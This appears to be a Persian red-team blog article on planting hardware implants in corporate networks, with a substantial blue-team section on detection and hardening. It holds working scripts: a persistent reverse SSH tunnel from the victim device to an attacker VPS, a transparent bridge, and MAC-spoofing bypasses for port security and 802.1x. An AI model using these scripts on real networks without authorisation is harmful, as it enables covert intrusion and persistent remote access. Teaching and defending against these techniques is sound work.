جاسوس در جعبه کوچک؛ فرآیند Hardware Initial Access
نویسنده: یاسین عابدینی · دسته: RedTeam · تاریخ انتشار: ۱۴۰۵/۲/۲۶
چرا Hardware Initial Access؟
در فرآیند Red Team، بعضی مواقع با موانعی مواجه میشویم که راههای سنتی نفوذ (مانند Phishing، Exploitation از طریق اینترنت، یا Social Engineering) کارساز نیستند. در این شرایط به در بسته میخوریم:
- Perimeter Security قوی: Firewallها، IPS/IDS، و Web Application Firewallهای پیشرفته که تمام ترافیک ورودی را فیلتر میکنند
- Air-Gapped Networks: شبکههایی که بهطور کامل از اینترنت جدا هستند (مانند شبکههای صنعتی، SCADA، یا شبکههای حساس دولتی)
- Zero Trust Architecture: معماریهایی که هیچ دسترسی پیشفرضی به منابع داخلی ندارند
- Email Security و Endpoint Protection پیشرفته: سیستمهایی که تمام فایلها و لینکها را در Sandbox بررسی میکنند
- User Awareness بالا: کارکنانی که آموزشهای امنیتی دیدهاند و بهراحتی فریب نمیخورند
در چنین سناریوهایی، Hardware Initial Access تنها راه ادامه فرآیند Red Team است. با دسترسی فیزیکی به محیط هدف (مثلاً از طریق Tailgating، Social Engineering فیزیکی، یا Insider Access)، میتوانیم:
- Bypass کردن تمام لایههای Perimeter Security - چون مستقیماً داخل شبکه قرار میگیریم
- دسترسی به شبکههای Internal که از بیرون قابل دسترسی نیستند
- Persistence ایجاد کنیم حتی اگر تمام راههای Remote Access مسدود شوند
- Lateral Movement را از داخل شبکه شروع کنیم
بنابراین Hardware Initial Access یک fallback strategy و در برخی موارد تنها گزینه موجود برای ادامه عملیات Red Team است.
Hardware Additions
در این بخش به بررسی روشهای مختلف نفوذ فیزیکی به شبکههای هدف از طریق نصب تجهیزات سختافزاری میپردازیم.
Direct Access Hardware Nodes
این دسته از تجهیزات بهصورت مستقیم به شبکه متصل شده و امکان دسترسی از راه دور را برای مهاجم فراهم میکنند:
1. Mikrotik-based Node (Mikrotik mAP lite)
استفاده از دستگاههای Mikrotik به دلیل اندازه کوچک، قابلیت اجرای scriptها و پشتیبانی از VPN، یکی از گزینههای محبوب برای ایجاد backdoor در شبکههای هدف است.
مزایا:
- اندازه بسیار کوچک (قابل مخفی کردن در فضاهای محدود)
- پشتیبانی از OpenVPN، WireGuard، L2TP
- قابلیت اجرای scriptهای RouterOS
- مصرف برق پایین (قابل تغذیه از PoE)
- قیمت مناسب
روشهای ارتباط با بیرون:
- Ethernet: اتصال مستقیم به شبکه سازمان
- WiFi: اتصال به شبکههای بیسیم مجاور (WiFi Hotspot، شبکههای عمومی)
- LTE USB Modem: استفاده از مودمهای USB LTE برای ارتباط مستقل از شبکه سازمان
2. Raspberry Pi Zero Node
این دستگاه کوچک و کممصرف یکی از پرکاربردترین ابزارها برای نفوذ فیزیکی است.
مراحل راهاندازی:
- Put SD Card
- Download Linux From Raspberry Zero
- Write On SD
- Put On Raspberry
- Install Ethernet Port
روشهای ارتباط با بیرون:
- Ethernet: اتصال به شبکه داخلی
- WiFi: استفاده از WiFi dongle یا ماژول داخلی (در مدلهای W)
- LTE/4G: استفاده از USB LTE modem یا ماژولهای SIM800/SIM7600 برای ارتباط مستقل
- LoRa: برای ارتباطات long-range با مصرف برق کم
نکته امنیتی: استفاده از LTE به دستگاه اجازه میدهد حتی در شبکههای Air-Gapped نیز با مهاجم در ارتباط باشد، زیرا کانال ارتباطی مستقل از شبکه سازمان است.
3. Custom Board Node
طراحی و ساخت boardهای اختصاصی با استفاده از microcontrollerها یا SoCهای کوچک برای سناریوهای خاص.
پلتفرمهای رایج:
- ESP32: WiFi/Bluetooth built-in، قیمت بسیار پایین
- Arduino: برای کارهای ساده و automation
- Orange Pi Zero: جایگزین ارزانتر Raspberry Pi
- GL.iNet routers: routerهای کوچک با OpenWrt
In-line Placement Devices
این دستگاهها بین دو نقطه شبکه (مثلاً بین switch و کامپیوتر قربانی) قرار میگیرند و traffic را بهصورت transparent عبور داده و در عین حال امکان monitoring و manipulation آن را فراهم میکنند.
پیکربندی transparent bridge در Linux:
SWINT=eth0 # interface متصل به switch
CLINT=eth1 # interface متصل به client
BRINT=br0 # bridge interface
# ایجاد bridge
brctl addbr $BRINT
brctl addif $BRINT $SWINT $CLINT
# فعالسازی promiscuous mode برای عبور transparent traffic
ifconfig $SWINT 0.0.0.0 up promisc
ifconfig $CLINT 0.0.0.0 up promisc
ifconfig $BRINT 0.0.0.0 up promisc
این پیکربندی باعث میشود دستگاه بهصورت کاملاً transparent در مسیر traffic قرار گیرد و از دید شبکه قابل تشخیص نباشد.
Point: backHome Scenario
یکی از تکنیکهای رایج برای حفظ دسترسی به دستگاه نفوذ شده، استفاده از Reverse SSH Tunnel است که به مهاجم اجازه میدهد از طریق یک VPS واسط به دستگاه قربانی دسترسی داشته باشد.
On Victim:
#!/bin/sh
while true; do
ssh -NC -o ServerAliveInterval=5 \
-o UserKnownHostsFile=/dev/null \
-o StrictHostKeyChecking=no \
-R '*:5353:127.0.0.1:22' AttackerUsername@VpsIp
sleep 5
done
توضیح parameterها:
-C: compression - فشردهسازی دادهها-N: no remote command - فقط port forwarding-o ServerAliveInterval=5: ارسال packet هر 5 ثانیه برای حفظ connection-o UserKnownHostsFile=/dev/null: عدم ذخیره fingerprint-o StrictHostKeyChecking=no: عدم بررسی هویت server-R '*:5353:127.0.0.1:22': remote port forwarding - پورت 5353 روی VPS به پورت 22 local
On Attacker:
# تولید SSH key
ssh-keygen -t ed25519 -f ~/.ssh/id_backhome -N ""
# کپی public key به authorized_keys قربانی
cat ~/.ssh/id_backhome.pub
# اتصال به قربانی از طریق tunnel
ssh -i ~/.ssh/id_backhome -p 5353 VictimUsername@localhost
Protected Network Bypass
راهکارهایی برای دور زدن شبکههای امن شده
NAC (Network Access Control)
NAC یک راهکار امنیتی است که policyهای دسترسی را در لایه شبکه enforce میکند:
Layer 2 Protection:
- MAC Filtering
- OUI Restriction
- 802.1x Authentication
- TCP Fingerprint
- NAC Policy
- NAT/SNAT in Layer 2
برای bypass کردن Port Security، میتوان از ebtables یا OPNsense استفاده کرد:
# تغییر source MAC address با ebtables
ebtables -t nat -A POSTROUTING -o eth0 -j snat --to-src dc:a6:32:df:89:9e
Port Security Bypass - اسکریپت کامل:
#!/bin/bash
SWINT=eth0
CLINT=eth1
BRINT=br0
# تغییر MAC address interface متصل به switch
ifconfig $SWINT down
macchanger --mac=dc:a6:32:df:89:9e eth0
sleep 3
# راهاندازی bridge
ifconfig $SWINT up
brctl addbr $BRINT
brctl addif $BRINT $SWINT $CLINT
ip link set dev $BRINT up
# فعالسازی promiscuous mode
ifconfig $SWINT 0.0.0.0 up promisc
ifconfig $CLINT 0.0.0.0 up promisc
ifconfig $BRINT 0.0.0.0 up promisc
# اعمال SNAT برای spoofing MAC address
ebtables -t nat -A POSTROUTING -o eth0 -j snat --to-src dc:a6:32:df:89:9e
# block کردن MAC واقعی دستگاه مهاجم
ebtables -I OUTPUT -s 00:b5:6d:02:a9:63 -o eth0 -j DROP
یافتن MAC Address قربانی:
tshark -i en0 -T fields -e eth.src
دور زدن مکانیزم 802.1x
پروتکل 802.1x برای authentication در Layer 2 استفاده میشود. زمانی که authentication موفق نباشد، port در حالت Orange قرار میگیرد و فقط EAP packetها اجازه عبور دارند.
روش Bypass:
- استفاده از Switch Base MAC + SNAT
یافتن Switch Base MAC:
- از EAP Packet
- دستور
show verروی switch
نکته: Switch Base MAC برای تمام portها trusted است.
اسکریپت 802.1x Bypass:
#!/bin/bash
SWINT=eth0
CLINT=eth1
BRINT=br0
# تنظیم MAC به Switch Base MAC
ifconfig $SWINT down
macchanger --mac=00:11:22:33:44:55 eth0 # switch base mac address
sleep 3
ifconfig $SWINT up
brctl addbr $BRINT
brctl addif $BRINT $SWINT $CLINT
ip link set dev $BRINT up
ifconfig $SWINT 0.0.0.0 up promisc
ifconfig $CLINT 0.0.0.0 up promisc
ifconfig $BRINT 0.0.0.0 up promisc
# SNAT به Switch Base MAC
ebtables -t nat -A POSTROUTING -o eth0 -j snat --to-src 00:11:22:33:44:55
ebtables -I OUTPUT -s 00:b5:6d:02:a9:63 -o eth0 -j DROP
محدودیت: DAI (Dynamic ARP Inspection) میتواند مانع این روش شود.
Sample (ابزارهای تجاری)
- PACKET SQUIRREL MARK II: دستگاه کوچک multi-payload برای man-in-the-middle و packet capture
- Shark Jack: ابزار portable برای network reconnaissance و payload injection
- LAN Tap Pro: دستگاه passive monitoring برای capture کردن traffic بدون تداخل
- CC1101 Module: ماژول RF برای ارتباطات sub-GHz
این ابزارها با قابلیتهای pre-configured و interface ساده، کار Red Team را تسهیل میکنند.
Detection: چگونه سازمانها میتوانند دستگاههای مخرب را شناسایی کنند؟
شناسایی دستگاههای سختافزاری مخرب یکی از چالشهای اصلی تیمهای Blue Team است. در اینجا روشهای مختلف detection را بررسی میکنیم:
1. Network-Based Detection
NAC (Network Access Control) Solutions
سیستمهای NAC میتوانند دستگاههای ناشناخته را شناسایی کنند:
- MAC Address Whitelisting: فقط MAC addressهای مجاز اجازه اتصال دارند
- Device Profiling: شناسایی دستگاه بر اساس fingerprint (DHCP options، TCP/IP stack، User-Agent)
- 802.1x Authentication: الزام به authentication قبل از دسترسی به شبکه
- Anomaly Detection: شناسایی رفتارهای غیرعادی (traffic pattern، protocol usage)
Network Monitoring و SIEM
- New Device Alerts: هشدار برای هر دستگاه جدید متصل به شبکه
- Traffic Analysis: شناسایی ترافیک مشکوک (SSH tunnels، VPN connections، unusual protocols)
- Baseline Deviation: مقایسه با baseline طبیعی شبکه
- Geolocation Anomalies: شناسایی اتصالات به IPهای خارج از کشور یا مشکوک
Port Security و Switch Configuration
! محدود کردن تعداد MAC address در هر port
switchport port-security maximum 2
switchport port-security violation shutdown
switchport port-security mac-address sticky
! فعالسازی DHCP Snooping
ip dhcp snooping
ip dhcp snooping vlan 10,20,30
! فعالسازی Dynamic ARP Inspection
ip arp inspection vlan 10,20,30
ip arp inspection validate src-mac dst-mac ip
2. Physical Security Measures
Regular Physical Audits
- Network Port Inspection: بررسی منظم تمام portهای شبکه برای دستگاههای ناشناخته
- Cable Management: استفاده از cable با رنگهای مشخص و label گذاری
- Port Blocking: مسدود کردن فیزیکی portهای استفاده نشده با RJ45 lock
- Equipment Inventory: نگهداری فهرست دقیق از تمام تجهیزات شبکه با serial number
Access Control
- Badge Systems: کنترل دسترسی فیزیکی به اتاقهای server و network closet
- CCTV Monitoring: نصب دوربین در نقاط حساس
- Visitor Management: نظارت دقیق بر بازدیدکنندگان و پیمانکاران
- Clean Desk Policy: جلوگیری از دسترسی آسان به portهای شبکه
3. Wireless Detection
Rogue Device Detection
بسیاری از دستگاههای implant از LTE، WiFi یا سایر تکنولوژیهای wireless برای ارتباط استفاده میکنند:
- Wireless IDS/IPS: شناسایی access pointهای غیرمجاز
- RF Scanning: اسکن منظم طیف رادیویی برای سیگنالهای مشکوک
- Cellular Detection: استفاده از ابزارهایی مانند Cell Phone Detectors یا IMSI Catchers برای شناسایی دستگاههای LTE
- Spectrum Analyzers: تحلیل طیف فرکانسی برای یافتن transmitterهای مخفی
ابزارهای تخصصی:
- Kismet: wireless network detector
- Aircrack-ng suite: برای شناسایی و تحلیل شبکههای بیسیم
- WiFi Pineapple Detector: شناسایی rogue access pointها
- HackRF / RTL-SDR: برای RF spectrum analysis
4. Endpoint Detection
Host-Based Monitoring
- USB Device Control: محدود کردن دستگاههای USB مجاز
- Ethernet Adapter Detection: شناسایی adapterهای جدید (مثلاً USB-to-Ethernet)
- Network Interface Monitoring: هشدار برای فعال شدن interfaceهای جدید
- ARP Table Monitoring: شناسایی تغییرات غیرعادی در ARP table
5. Behavioral Analysis
Indicators of Compromise (IoCs)
رفتارهای مشکوک که میتوانند نشاندهنده وجود implant باشند:
- Persistent Outbound Connections: اتصالات مداوم به IPهای خارجی (VPS، cloud providers)
- Reverse SSH Tunnels: traffic pattern مشابه SSH با connectionهای long-lived
- Unusual Protocols: استفاده از پروتکلهای غیرمعمول (GRE، IPsec، custom protocols)
- Beaconing Behavior: ارتباطات منظم با interval ثابت (مثلاً هر 5 دقیقه)
- Data Exfiltration Patterns: انتقال حجم زیاد داده به بیرون
- DNS Tunneling: queryهای DNS غیرعادی با payload
Network Flow Analysis
# استفاده از NetFlow/sFlow برای شناسایی patternهای مشکوک
# مثال: یافتن connectionهای long-lived
nfdump -R /var/log/netflow -o extended | \
awk '$10 > 3600 {print}' | \
sort -k 10 -rn
6. Advanced Detection Techniques
Power Consumption Analysis
در محیطهای بسیار حساس، میتوان از تحلیل مصرف برق برای شناسایی دستگاههای اضافی استفاده کرد:
- نصب Power Monitoring روی هر rack
- مقایسه مصرف برق با baseline
- شناسایی افزایش غیرمنتظره مصرف
Thermal Imaging
- استفاده از دوربینهای حرارتی برای یافتن دستگاههای مخفی
- شناسایی heat signature غیرعادی در دیوارها، سقف، یا کف
Time-Domain Reflectometry (TDR)
- تست کابلها برای شناسایی دستگاه
- اندازهگیری impedance و یافتن anomaly در مسیر کابل
Physical Concealment
- استفاده از enclosureهای شبیه تجهیزات legitimate
- نصب در مکانهای دور از دسترس (پشت rack، زیر کف کاذب)
- استفاده از دستگاههای بسیار کوچک (Raspberry Pi Zero، ESP32)
- Integration با تجهیزات موجود (مثلاً داخل یک UPS یا PDU)
.5 Defense in Depth Strategy
بهترین رویکرد برای مقابله با Hardware Initial Access، استفاده از چندین لایه دفاعی است:
- Prevention: جلوگیری از نصب (physical security، access control)
- Detection: شناسایی سریع در صورت نصب (NAC، monitoring، audits)
- Response: واکنش فوری و مؤثر (isolation، forensics، removal)
- Recovery: بازگردانی به حالت امن (credential rotation، network reconfiguration)
Checklist برای سازمانها
| لایه دفاعی | اقدامات | وضعیت پیادهسازی |
|---|---|---|
| Prevention | کنترل دسترسی فیزیکی به اتاقهای server و network closet | ☐ |
| مسدودسازی portهای استفاده نشده با RJ45 lock | ☐ | |
| پیادهسازی visitor management و escort policy | ☐ | |
| آموزش کارکنان درباره تهدیدات فیزیکی | ☐ | |
| نصب دوربینهای CCTV در نقاط حساس | ☐ | |
| پیادهسازی clean desk policy | ☐ | |
| Detection | پیادهسازی NAC با MAC whitelisting | ☐ |
| فعالسازی 802.1x authentication | ☐ | |
| پیکربندی port security روی switchها | ☐ | |
| فعالسازی DHCP snooping و DAI | ☐ | |
| راهاندازی network monitoring و SIEM | ☐ | |
| پیادهسازی wireless IDS/IPS | ☐ | |
| انجام physical audit منظم (ماهانه/فصلی) | ☐ | |
| نگهداری inventory دقیق از تجهیزات | ☐ | |
| Response | تعریف incident response plan برای hardware implant | ☐ |
| پیادهسازی auto-quarantine برای دستگاههای مشکوک | ☐ | |
| آمادهسازی forensic toolkit (packet capture، memory dump) | ☐ | |
| Recovery | credential rotation برای حسابهای در معرض خطر | ☐ |
| بررسی و بهروزرسانی firewall rules | ☐ | |
| تحلیل logs برای شناسایی lateral movement | ☐ | |
| بازبینی و تقویت physical security controls | ☐ | |
| انجام lessons learned session و بهروزرسانی policyها | ☐ |
نکات کلیدی برای تیمهای Blue
- هیچ لایه دفاعی به تنهایی کافی نیست: ترکیب physical security، network controls، و monitoring ضروری است
- Visibility اولویت اول است: نمیتوانید چیزی را که نمیبینید محافظت کنید - پوشش کامل monitoring حیاتی است
- Baseline شناخته شده داشته باشید: برای شناسایی anomaly، باید رفتار normal شبکه را بشناسید
- Physical security را دست کم نگیرید: بهترین firewall دنیا نمیتواند از یک دستگاه فیزیکی داخل شبکه جلوگیری کند
- آموزش مداوم: کارکنان باید بدانند چه چیزی مشکوک است و چگونه گزارش دهند
- تست منظم: انجام red team exerciseهای فیزیکی برای ارزیابی کنترلها
- Response plan آماده: زمان واکنش در این سناریوها بسیار حیاتی است
جمعبندی
Hardware Initial Access یک تهدید واقعی و جدی است که نیاز به رویکرد جامع دارد. سازمانها باید:
- Physical security را به اندازه cyber security جدی بگیرند
- چندین لایه دفاعی پیادهسازی کنند
- Visibility کامل از شبکه داشته باشند
- بهطور مداوم کنترلهای خود را تست و بهبود دهند
- در صورت یک ضعف کوچک در BlueTeam در این تکنیک دست برنده با RedTeam با مهاجم هست
به یاد داشته باشید: امنیت یک فرآیند مداوم است، نه یک محصول یکباره.